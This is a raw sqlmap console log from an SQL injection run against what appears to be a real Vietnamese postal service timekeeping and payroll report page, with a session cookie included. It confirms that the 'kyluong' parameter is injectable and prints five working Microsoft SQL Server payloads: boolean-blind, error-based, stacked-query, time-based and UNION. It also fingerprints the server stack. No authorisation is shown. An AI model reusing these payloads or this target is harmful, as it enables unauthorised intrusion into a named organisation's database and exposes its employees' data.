        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.11.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:52:42 /2025-11-17/

[18:52:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' from file '/tmp/sqlmap/data/txt/user-agents.txt'
[1/1] URL:
GET http://vps.vnpost.vn/chamcong/report/rpt_BCC.aspx?kyluong=112025&MA_DV=KVMB&TEN_DV=Kho%20v%E1%BA%ADn%20mi%E1%BB%81n%20b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC%20Khai%20th%C3%A1c%20TC&MA_TO=VP&TEN_TO=V%C4%83n%20ph%C3%B2ng
Cookie: ASP.NET_SessionId=lswqd4itz5u4ftzm3jcmjfio
do you want to test this URL? [Y/n/q]
> Y
[18:52:42] [INFO] testing URL 'http://vps.vnpost.vn/chamcong/report/rpt_BCC.aspx?kyluong=112025&MA_DV=KVMB&TEN_DV=Kho%20v%E1%BA%ADn%20mi%E1%BB%81n%20b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC%20Khai%20th%C3%A1c%20TC&MA_TO=VP&TEN_TO=V%C4%83n%20ph%C3%B2ng'
[18:52:42] [INFO] using '/home/ubuntu/.local/share/sqlmap/output/results-11172025_0652pm.csv' as the CSV results file in multiple targets mode
[18:52:42] [INFO] testing connection to the target URL
[18:52:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:52:45] [CRITICAL] WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)'
are you sure that you want to continue with further target testing? [Y/n] Y
[18:52:45] [WARNING] please consider usage of tamper scripts (option '--tamper')
[18:52:45] [INFO] testing if the target URL content is stable
[18:52:47] [INFO] target URL content is stable
[18:52:47] [INFO] testing if GET parameter 'kyluong' is dynamic
[18:52:48] [WARNING] GET parameter 'kyluong' does not appear to be dynamic
[18:52:49] [INFO] heuristic (basic) test shows that GET parameter 'kyluong' might be injectable (possible DBMS: 'Microsoft SQL Server')
[18:52:50] [INFO] testing for SQL injection on GET parameter 'kyluong'
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (2) and risk (2) values? [Y/n] Y
[18:52:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:52:52] [WARNING] reflective value(s) found and filtering out
[18:53:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:53:43] [INFO] GET parameter 'kyluong' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable (with --code=200)
[18:53:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:53:45] [INFO] GET parameter 'kyluong' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' injectable 
[18:53:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:54:09] [INFO] GET parameter 'kyluong' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable 
[18:54:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[18:54:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF - comment)'
[18:54:35] [INFO] GET parameter 'kyluong' appears to be 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' injectable 
[18:54:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:54:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:54:38] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:54:43] [INFO] target URL appears to have 5 columns in query
[18:54:51] [WARNING] combined UNION/error-based SQL injection case found on column 5. sqlmap will try to find another column with better characteristics
[18:54:51] [INFO] GET parameter 'kyluong' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'kyluong' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: kyluong (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: kyluong=112025' AND 2784=(SELECT (CASE WHEN (2784=2784) THEN 2784 ELSE (SELECT 7134 UNION SELECT 5563) END))-- gZAK&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: kyluong=112025' AND 4111 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4111=4111) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(120)+CHAR(113))) AND 'mddd'='mddd&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: kyluong=112025';WAITFOR DELAY '0:0:5'--&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: kyluong=112025' WAITFOR DELAY '0:0:5'--&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: kyluong=112025' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(107)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(73)+CHAR(120)+CHAR(99)+CHAR(75)+CHAR(114)+CHAR(82)+CHAR(104)+CHAR(102)+CHAR(72)+CHAR(83)+CHAR(98)+CHAR(106)+CHAR(81)+CHAR(102)+CHAR(74)+CHAR(72)+CHAR(83)+CHAR(98)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(69)+CHAR(67)+CHAR(81)+CHAR(82)+CHAR(82)+CHAR(122)+CHAR(100)+CHAR(104)+CHAR(78)+CHAR(81)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(111)+CHAR(104)+CHAR(68)+CHAR(110)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(120)+CHAR(113)-- kFjk&MA_DV=KVMB&TEN_DV=Kho v%E1%BA%ADn mi%E1%BB%81n b%E1%BA%AFc&MA_BP=TC&TEN_BP=BC Khai th%C3%A1c TC&MA_TO=VP&TEN_TO=V%C4%83n ph%C3%B2ng
---
do you want to exploit this SQL injection? [Y/n] Y
[18:54:52] [INFO] testing Microsoft SQL Server
[18:54:53] [INFO] confirming Microsoft SQL Server
[18:55:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2022 or 10 or 2019 or 11 or 2016
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 10.0
back-end DBMS: Microsoft SQL Server 2017
[18:55:01] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 35 times
[18:55:01] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/ubuntu/.local/share/sqlmap/output/results-11172025_0652pm.csv'

[*] ending @ 18:55:01 /2025-11-17/

